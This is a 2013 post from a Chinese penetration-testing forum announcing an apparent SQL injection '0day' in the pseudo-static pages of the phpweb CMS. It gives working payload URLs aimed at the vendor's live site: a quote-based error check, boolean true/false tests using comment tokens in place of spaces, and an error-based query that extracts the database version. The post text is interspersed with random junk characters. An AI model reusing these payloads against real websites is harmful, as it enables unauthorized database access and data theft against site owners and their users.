找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2268|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
8 }# j) N; u! W0 f. e
. `8 J; L4 H7 }: t$ j0 i4 q: y) S; L主站:http://phpweb.net/* \, s( W4 I" ^1 j& V) a
加’检测:
3 x8 T  a  R+ l# u: Y   ^# ?3 e, ^/ [+ ^8 `6 Q) Q2 |0 v
http://www.phpweb.net/down/html/?772′.html$ \. X4 Q* {! y% h, a! P
8 W$ _: P& q0 m$ t+ v
出错
- W  @5 {# d2 ?1 g# J* ~2 [存在注入。5 r* U- g, m: z) M; R
不能用空格,只能用/*罗
, y: v) }1 |* F4 \% u+ jhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常1 B& f5 ?8 Q, K" \" Y

# @$ r- j2 c. M0 ~# ~" n* S& _$ Ahttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
$ X% F! w; Q! S5 s+ y5 r: b爆数据库版本:$ e+ |/ s- e0 A. b1 `. B; ?& r
2 Y3 T) g3 `4 [; `/ |" ]7 q" B9 N! i
?7 F' c' M! Z1 b. T$ c7 L6 C
1$ z$ b4 A7 W8 Z8 H6 }
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
! S2 T. e1 f$ d5 x- O更新日期: 2013-01-03 13:39:50        
$ L4 X% p5 {. A% D" {
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表